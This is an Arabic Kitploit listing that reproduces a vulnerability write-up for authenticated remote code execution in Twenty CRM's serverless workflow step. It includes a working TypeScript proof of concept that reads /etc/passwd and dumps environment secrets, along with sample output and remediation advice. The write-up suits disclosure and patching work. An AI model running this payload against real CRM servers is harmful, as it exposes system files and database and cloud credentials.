Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26720-Twenty-RCE — إثبات المفهوم لتنفيذ الأوامر عن بُعد بشكل مصادق عليه في Twenty CRM عبر وظائف سير عمل بدون خادم غير معزولة، مما يسمح بتنفيذ أوامر Node.js عشوائية وكشف متغيرات البيئة. | Kitploit
أدوات/GitHubGitHub/dillonkirsch/cve-2026-26720-twenty-rce
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن السحابةسوء التكوين
GitHubdillonkirsch/cve-2026-26720-twenty-rce

CVE-2026-26720-Twenty-RCE

إثبات المفهوم لتنفيذ الأوامر عن بُعد بشكل مصادق عليه في Twenty CRM عبر وظائف سير عمل بدون خادم غير معزولة، مما يسمح بتنفيذ أوامر Node.js عشوائية وكشف متغيرات البيئة.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Twenty CRM - تنفيذ التعليمات البرمجية عن بُعد (RCE) بعد المصادقة

نظرة عامة

المنتج: Twenty CRM

الثغرة الأمنية: تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر دوال Serverless في سير العمل

الخطورة: حرجة

المكوّن المتأثر: أتمتة سير العمل (Code - Serverless Function)

الإصدار المُختبَر: v1.15.0

يوثّق هذا المستودع ثغرة أمنية حرجة في محرك سير العمل الخاص بـ Twenty CRM. يسمح مكوّن "Code - Serverless Function" للمستخدمين المُصادَق عليهم بتنفيذ تعليمات Node.js برمجية عشوائية. وبسبب غياب العزل (Sandboxing)، يمكن استيراد وحدة child_process وتنفيذ أوامر على مستوى النظام في الخادم المضيف.

تفاصيل الثغرة الأمنية

يتيح التطبيق للمستخدمين إنشاء سير عمل أتمتة مخصصة تتضمن خطوة تنفيذ تعليمات برمجية. وبينما يُقصد من ذلك معالجة البيانات، فإن بيئة التنفيذ لا تقيّد بشكل صحيح الوصول إلى الوحدات المدمجة في Node.js أو نظام التشغيل الأساسي.

يمكن للمهاجم استخدام execSync من مكتبة child_process من أجل:

  1. تنفيذ أوامر الصدفة (مثل: cat, , ).
ls
whoami
  • قراءة ملفات حساسة من نظام الملفات (مثل: /etc/passwd).
  • تفريغ متغيرات البيئة (process.env)، مما يكشف عن بيانات اعتماد قاعدة البيانات ومفاتيح API وأسرار التطبيق.
  • إثبات المفهوم (PoC)

    خطوات إعادة الإنتاج

    1. سجّل الدخول إلى Twenty CRM.
    2. انتقل إلى Settings > Workflows.
    3. أنشئ سير عمل جديدًا باستخدام Manual Trigger.
    4. أضف إجراءً: Code - Serverless Function.
    5. الصق الحمولة التالية بلغة TypeScript في محرر التعليمات البرمجية:
    root@kitploit:~
    import { execSync } from 'child_process';
    
    export const main = async (params: any): Promise<object> => {
      try {
        // 1. Remote Command Execution: Read system users
        const output = execSync('cat /etc/passwd').toString();
        
        // 2. Information Disclosure: Dump all environment variables (Secrets)
        const secrets = JSON.stringify(process.env);
        
        return { 
          data: output, 
          secrets: secrets 
        };
      } catch (e: any) {
        return { error: e.message };
      }
    };
    
    
    1. احفظ سير العمل وشغّله.

    Code Overview

    المخرجات المُلاحَظة

    يتم تنفيذ سير العمل بنجاح ويعيد بيانات النظام.

    الوصول إلى ملفات النظام (/etc/passwd):

    root@kitploit:~
    root:x:0:0:root:/root:/bin/sh
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
    ...
    
    

    تسريب متغيرات البيئة: كشف تفريغ process.env عن تفاصيل إعدادات حرجة:

    • PG_DATABASE_URL (بيانات اعتماد قاعدة البيانات)
    • APP_SECRET (مفاتيح التوقيع)
    • REDIS_URL
    • AWS_ACCESS_KEY (إذا تم تكوينه)

    التأثير

    تسمح هذه الثغرة الأمنية لمستخدم مُصادَق عليه (بصلاحية إنشاء سير عمل) بتحقيق اختراق كامل للنظام.

    • السرية: يمكن للمهاجمين قراءة جميع البيانات في قاعدة البيانات ونظام الملفات.
    • السلامة: يمكن للمهاجمين تعديل كود التطبيق أو حذف البيانات أو حقن برمجيات خبيثة.
    • التوافر: يمكن للمهاجمين إيقاف تشغيل الخادم أو استهلاك جميع الموارد.

    المعالجة

    لإصلاح هذه المشكلة، تتطلب ميزة "Serverless Function" عزلًا مناسبًا.

    • تنفيذ العزل (Sandboxing): يجب تنفيذ التعليمات البرمجية في بيئة مقيدة (مثل: بيئة عزل VM2، أو حاوية Docker مخصصة بدون وصول للشبكة/وحدات التخزين، أو جهاز افتراضي مصغّر مثل Firecracker).
    • تقييد الوحدات: تعطيل الوصول إلى وحدات Node.js الحساسة مثل child_process وfs وnet.
    • تنظيف متغيرات البيئة: التأكد من أن سياق التنفيذ لا يرث متغيرات البيئة الخاصة بالعملية الأم (التي تحتوي على أسرار التطبيق).

    الجدول الزمني

    • 8 يناير 2026: اكتشاف الثغرة الأمنية.
    • [التاريخ]: الإبلاغ إلى فريق أمان Twenty CRM.
    • [الحالة]: بانتظار التصحيح.
    تنزيل الأداة